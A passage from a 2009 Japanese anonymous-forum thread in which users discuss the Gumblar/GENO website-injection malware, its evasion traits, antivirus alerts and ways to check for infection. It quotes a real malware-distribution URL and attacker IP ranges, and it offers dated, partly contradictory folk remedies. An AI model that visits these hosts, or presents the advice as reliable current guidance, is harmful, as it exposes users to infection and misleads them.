なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…
642:名無しさん@お腹いっぱい。
09/05/15 01:33:34
ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で
IE6にて、あさがやドラム のURLを開くと 「危険なサイト アドレス http://gumblar.cn/rss/?id=568835」とメッセージが出た
643:名無しさん@お腹いっぱい。
09/05/15 01:36:45
UnderForge of Lack ≫ Zlkon, Gumblar 問題に関して
URLリンク(www3.atword.jp)
%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
644:名無しさん@お腹いっぱい。
09/05/15 01:39:56
gumblarに感染してたサイトのお詫び文が、
ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、
avastユーザからの指摘がウザイので一応アップし直します
のように書いてあってなんだか悔しくなった
感染してもはっきり分からないから世間の感覚はこんなもんか
645:名無しさん@お腹いっぱい。
09/05/15 01:40:18
初心なことかもしれないけど
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
を制限するさいtcpとudpどっちなの?
646:名無しさん@お腹いっぱい。
09/05/15 01:42:21
アップし直すだけじゃ無駄なのにな
647:名無しさん@お腹いっぱい。
09/05/15 01:44:33
>>643
これ、次スレのテンプレに入れた方が良いんじゃね?
648:642
09/05/15 01:45:41
>>644
ウイルスバスターでもブロックはできているみたいだ
649:644
09/05/15 01:48:40
>>648
おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから
650:名無しさん@お腹いっぱい。
09/05/15 01:48:58
>>645
TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね
651:642
09/05/15 01:53:32
>>649
ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ
652:名無しさん@お腹いっぱい。
09/05/15 01:56:32
久しぶりに踏んでみたがリファラをチェックするようになったんだな
リファラ切ってるとpdfもswfも読み込まれない
653:名無しさん@お腹いっぱい。
09/05/15 01:56:41
>>650
おk
ありがとう
654:名無しさん@お腹いっぱい。
09/05/15 01:57:19
>>645
どちらかを制限しない理由があるのか?
655:名無しさん@お腹いっぱい。
09/05/15 02:01:07
すっげーやばそうなウイルスなのに
あまり騒がれていないのは気のせいなの?
656:名無しさん@お腹いっぱい。
09/05/15 02:01:22
>>644
パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。
657:名無しさん@お腹いっぱい。
09/05/15 02:02:26
>>641
運が悪いと壊れるかもしれないけど切断とHDD関係なくね?
658:名無しさん@お腹いっぱい。
09/05/15 02:02:41
パスワード変えても無駄
659:名無しさん@お腹いっぱい。
09/05/15 02:05:20
管理者のPCのOSをクリーンインスコして、パスワードを変える。
660:名無しさん@お腹いっぱい。
09/05/15 02:06:19
バスターはフィルタリング機能があるから
URLブラックリストに登録されれば遮断してくれるということか
661:名無しさん@お腹いっぱい。
09/05/15 02:06:28
URLリンク(jvnrss.ise.chuo-u.ac.jp)
URLリンク(detail.chiebukuro.yahoo.co.jp)
URLリンク(excomp.cocolog-nifty.com)
URLリンク(puppet.asablo.jp)
URLリンク(dxd8.com)
URLリンク(ilion.blog.shinobi.jp)
662:名無しさん@お腹いっぱい。
09/05/15 02:08:20
>>655
気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・
663:名無しさん@お腹いっぱい。
09/05/15 02:08:31
URLリンク(blogs.yahoo.co.jp)
URLリンク(excomp.cocolog-nifty.com)
告知情報はこんなもんか?
豚インフルの比じゃねえ はんぱねえ感染力!
664:名無しさん@お腹いっぱい。
09/05/15 02:11:16
GENOは結局どこからこのウイルス持ってきたんだろ。
665:名無しさん@お腹いっぱい。
09/05/15 02:11:38
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
666:名無しさん@お腹いっぱい。
09/05/15 02:12:32
>>662
動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ
667:名無しさん@お腹いっぱい。
09/05/15 02:13:33
>>665
Gumblarさん、マジパネェっす!
668:名無しさん@お腹いっぱい。
09/05/15 02:15:49
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
669:名無しさん@お腹いっぱい。
09/05/15 02:16:31
俺は考えるのをやめた
670:名無しさん@お腹いっぱい。
09/05/15 02:19:18
>>666
だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・
671:名無しさん@お腹いっぱい。
09/05/15 02:33:38
>>508
参考にしてみた
thx
672:名無しさん@お腹いっぱい。
09/05/15 02:34:21
GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな
・JavaScriptオフ
GENOの例を見る限り改竄はリモートから行われている。
今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。
この場合JSオフでの対応は不可能。
・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う
攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。
最悪の場合ゼロデイを狙われる可能性もある。
・IE以外のブラウザを使う
Adobe関連の脆弱性はブラウザに依存しない。
・IPまたはドメインでブロック
攻撃コードを更新していくらでも別のサーバに振り向けることが可能。
・アンチウィルスでの対応
攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。
673:名無しさん@お腹いっぱい。
09/05/15 02:35:18
>>666
readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい(ニコ動は警告出してたような)
readerの方はアップデートしない人多いだろうなあ
674:名無しさん@お腹いっぱい。
09/05/15 02:39:38
GENOにかかるとネットに繋がる時間が長くなるってほんと?
Googleに全然つながらないんだが
675:名無しさん@お腹いっぱい。
09/05/15 02:42:26
Flash Playerを無効にしたらどう?
IEだと切り替え大変だけれど
676:名無しさん@お腹いっぱい。
09/05/15 02:48:20
ネットのインフルエンザはパンデミックだな
てか無自覚で感染してるPC多いんじゃないか?
677:名無しさん@お腹いっぱい。
09/05/15 02:49:11
何か感染したと思ったんだけど
いろんなチェックしてたらIE落ちなくなったわ
でもゲームが反応無しになる、なんだこれ
678:名無しさん@お腹いっぱい。
09/05/15 02:49:27
はんぱねえ
679:名無しさん@お腹いっぱい。
09/05/15 02:51:31
何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの?
680:名無しさん@お腹いっぱい。
09/05/15 02:58:19
WinMeなんですが、GENOウイルスに感染する危険はありますか?
XPはヤバイと聞きますが・・・
681:名無しさん@お腹いっぱい。
09/05/15 02:59:24
Meの情報ないね どうなの?
682:名無しさん@お腹いっぱい。
09/05/15 03:03:17
これが後に語り継がれるMe最強伝説の始まりである。
683:名無しさん@お腹いっぱい。
09/05/15 03:03:27
親父が頑なにjavaオンのIEを使いたがる
切り替えが楽なプニルや火狐も入れといて説明したのに
684:名無しさん@お腹いっぱい。
09/05/15 03:07:07
>>672
ジャバスクいつも切っていて火狐でネトサフしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染0だったがブートスキャンも
しといたほうがいいかな?
685:名無しさん@お腹いっぱい。
09/05/15 03:09:05
JavaScriptオフでも感染!?
686:名無しさん@お腹いっぱい。
09/05/15 03:12:06
>>684
俺、avastでチェストに隔離できなかったんだけど大丈夫かな?
687:名無しさん@お腹いっぱい。
09/05/15 03:17:39
豚どころじゃねえぞ おい
688:名無しさん@お腹いっぱい。
09/05/15 03:18:59
これ対策でAdobe Readerを9に入れ替えたけど、
実は6.0.6を使ってた方が安全だったりする?w
689:名無しさん@お腹いっぱい。
09/05/15 03:19:38
オフにして感染されちゃどうしようもないなぁ
690:名無しさん@お腹いっぱい。
09/05/15 03:23:02
>>684
JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。
691:名無しさん@お腹いっぱい。
09/05/15 03:24:17
はやい話でIEが狙われているのですか?
692:名無しさん@お腹いっぱい。
09/05/15 03:25:25
>>686
他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおkで終わった
今日のは右下に三つくらい説明が出てクリックしたらおkが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た
因みにフラッシュは最新版だがリーダーは7
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない
693:名無しさん@お腹いっぱい。
09/05/15 03:27:23
>>691
はやい話でそういうこと
しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ
694:名無しさん@お腹いっぱい。
09/05/15 03:32:29
>>692
俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにIEを閉じたんだよ
で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね
んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・
これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな?
チェストに移動できなかったのは、すぐにブラウザを閉じたから?
695:名無しさん@お腹いっぱい。
09/05/15 03:32:58
感染サイトにアクセスしてしまったよ
Avastがブロックしてくれたよ ママン…
いったいこのウイルスは
どのくらいの規模なのですか?
696:名無しさん@お腹いっぱい。
09/05/15 03:33:19
>>695
チェストに移動できた?
697:名無しさん@お腹いっぱい。
09/05/15 03:34:15
>>690
怖くてソース覗きに行く勇気ありませんw
二回ともジャバスクきった状態で警告された
隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった
698:名無しさん@お腹いっぱい。
09/05/15 03:37:13
さっき知って飛んできました
みごとに感染してました オワタ
699:名無しさん@お腹いっぱい。
09/05/15 03:38:14
感染したらどうすればいいですか?
700:名無しさん@お腹いっぱい。
09/05/15 03:38:22
感染しているか、していないか確認する方法ってありますかね?
701:名無しさん@お腹いっぱい。
09/05/15 03:40:52
>>700
>>665にあります
感染したらインストールし直すしかないのでしょうか?
702:名無しさん@お腹いっぱい。
09/05/15 03:42:53
>>699
ご愁傷さま
PCのOSクリーンインスコ入れ替えれ
703:名無しさん@お腹いっぱい。
09/05/15 03:43:36
>>697
ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め
704:名無しさん@お腹いっぱい。
09/05/15 03:44:03
Avastが活躍する話が多いな
Aviraから乗り換えようか悩む
705:名無しさん@お腹いっぱい。
09/05/15 03:44:07
キャッシュはこれか?
URLリンク(support.mozilla.com)のキャッシュファイルがウイルスに感染した
706:名無しさん@お腹いっぱい。
09/05/15 03:45:43
スレを見返したり、まとめ見たり、ググったりすればすぐわかることだと思うけど、
クリーンインストール以外の解決策は今のところないよ
707:名無しさん@お腹いっぱい。
09/05/15 03:46:34
あの今日一日で3つも感染しているホームページを開いてしまいました
TVはインフルエンザよりもこっちを報道するべきじゃないですか
708:名無しさん@お腹いっぱい。
09/05/15 03:50:16
>>701
Meの場合は、どのファイルを見ればいいですか?
709:名無しさん@お腹いっぱい。
09/05/15 03:53:32
Meまだ使ってる人多いのかな?
感染報告ないよね。気になるなぁ
710:名無しさん@お腹いっぱい。
09/05/15 03:55:10
Me使っているくらいなら
感染していても無自覚なんじゃないか?
711:名無しさん@お腹いっぱい。
09/05/15 03:55:24
>>698
何で調べたの?
712:名無しさん@お腹いっぱい。
09/05/15 03:56:01
firefoxの話題が多いようだからさっきfirefox導入して
ieのお気に入りをfirefoxにインポートしたんだけど
そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい
一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど
今回の件と関係あるかな?
713:名無しさん@お腹いっぱい。
09/05/15 03:58:19
>>711
上に出ていた方法で調べました
どうしよう orz
714:名無しさん@お腹いっぱい。
09/05/15 03:58:26
>>712
spybotスレに似たような報告があったと思うが
誤検出っぽいよ
715:名無しさん@お腹いっぱい。
09/05/15 03:58:28
とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。
以前もこんな感じのことがあったよな。
その時は犯人が逮捕されたけれど。
勿論、外国で外国人が逮捕されたわけだがな。
被害が世界中に及ぶから性質が悪い。
716:名無しさん@お腹いっぱい。
09/05/15 04:00:34
>>591
>本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
>URLリンク(itpro.nikkeibp.co.jp)
の
>このプログラムをウイルスだと判定したのは14製品だけだった
この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。
717:名無しさん@お腹いっぱい。
09/05/15 04:00:41
ここまで危険なウイルスっていままでにあった?
知り合いが感染していたよ。
まじやばい。
718:名無しさん@お腹いっぱい。
09/05/15 04:03:33
ニフティのオンラインスキャンしたけど感染してなくてほっとした。
バスター2009いれてて、URLフィルタもフィッシングブロックも有効にしてるけど
XPだから油断できないな…
firefoxでも危険なんだよなコレ?
うかつにネサフできねーじゃん…
719:名無しさん@お腹いっぱい。
09/05/15 04:04:34
>>714
ええ、そうなの?
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx
720:名無しさん@お腹いっぱい。
09/05/15 04:05:39
感染したかどうかがわからんが
ニコニコみてたら(クリックした時)IEがよく固まるな。
つーか、発見から3ヶ月くらいたってない?
いまだ解決策はおろか、判別法も無しかよw
721:名無しさん@お腹いっぱい。
09/05/15 04:06:19
sqlsodbc.chmはとりあえず改ざんされてない場合の場所に
ファイル名実行できた
AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST
スキャンで感染0だったからもう寝るヽ(`Д´)ノ
722:名無しさん@お腹いっぱい。
09/05/15 04:06:40
>>610
気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・
723:名無しさん@お腹いっぱい。
09/05/15 04:07:04
発見から3ヶ月もたってるのか?これ。
さっきブログではじめて知ったよ。
どこかで報道されていないの?
724:名無しさん@お腹いっぱい。
09/05/15 04:08:15
>>720
genoで見つかったのが4月最初くらいじゃなかったか?だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど
725:名無しさん@お腹いっぱい。
09/05/15 04:08:35
システムの復元は無意味?
726:名無しさん@お腹いっぱい。
09/05/15 04:10:22
>>725
クリンインスコをおすすめ
システムそのものを書き換えます
727:名無しさん@お腹いっぱい。
09/05/15 04:10:42
>>725
感染したんならクリーンインストール以外は意味ないよ
728:名無しさん@お腹いっぱい。
09/05/15 04:10:46
4月に楽天のスレでGENO感染楽天店舗対応最悪で
プチ祭があったけど我が身に這い寄ってくるとは
おもなんだナイアルラトホテプ
729:名無しさん@お腹いっぱい。
09/05/15 04:12:05
>>727
はっきりと感染ってどうやったら判明するのか
明確な基準ないよな
730:名無しさん@お腹いっぱい。
09/05/15 04:13:18
>>724
1ヶ月半なら、もっとニュースになっていてもいいよね?
検索してみても個人のページしか出てこないや
731:名無しさん@お腹いっぱい。
09/05/15 04:15:54
感染したら、クリーンインストールするしかない
って言うけどさ、そもそも感染しているのかどうか判別できないんだけど?
感染の有無を判定する方法って何か無いの?
732:名無しさん@お腹いっぱい。
09/05/15 04:16:02
GENOウイルス大活躍だな、なんでこんなにすごいんだ?
733:名無しさん@お腹いっぱい。
09/05/15 04:16:16
>>718
IEよりはだいぶましだが油断は禁物
734:名無しさん@お腹いっぱい。
09/05/15 04:17:23
>>731
過去スレ、ちゃんと見たか?
完璧な判定方法がないからやべえんだよ、こいつは。
735:名無しさん@お腹いっぱい。
09/05/15 04:17:36
とりあえず、avastでチェックかけたら大丈夫だった
あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな?
736:名無しさん@お腹いっぱい。
09/05/15 04:20:40
現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない
感じ?
どこのサイトで感染するか分からないという恐ろしい事態だな
(((( ;゚Д゚)))ガクガクブルブル
737:名無しさん@お腹いっぱい。
09/05/15 04:21:01
URLリンク(www3.atword.jp)
こちらを見るとすごおおおおおおおくまずそうなのですが
この予感は当たっていますか?
NTTが感染しているなんて、信じられないのですが
738:名無しさん@お腹いっぱい。
09/05/15 04:22:52
>>736
その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い
739:名無しさん@お腹いっぱい。
09/05/15 04:24:55
>>736
んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう
>>737
そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい
740:名無しさん@お腹いっぱい。
09/05/15 04:25:07
Adobe Readerってアンインストールしてもいいんですか?
741:名無しさん@お腹いっぱい。
09/05/15 04:25:56
>>740
使わないんならいいんじゃね?
不便だけどさw
742:名無しさん@お腹いっぱい。
09/05/15 04:27:41
>>741
このウィルス知ってから何もかも恐る恐るって感じなんですよ・・・
とりあえず滅多に使わないんで消しときました
レスありがとうございます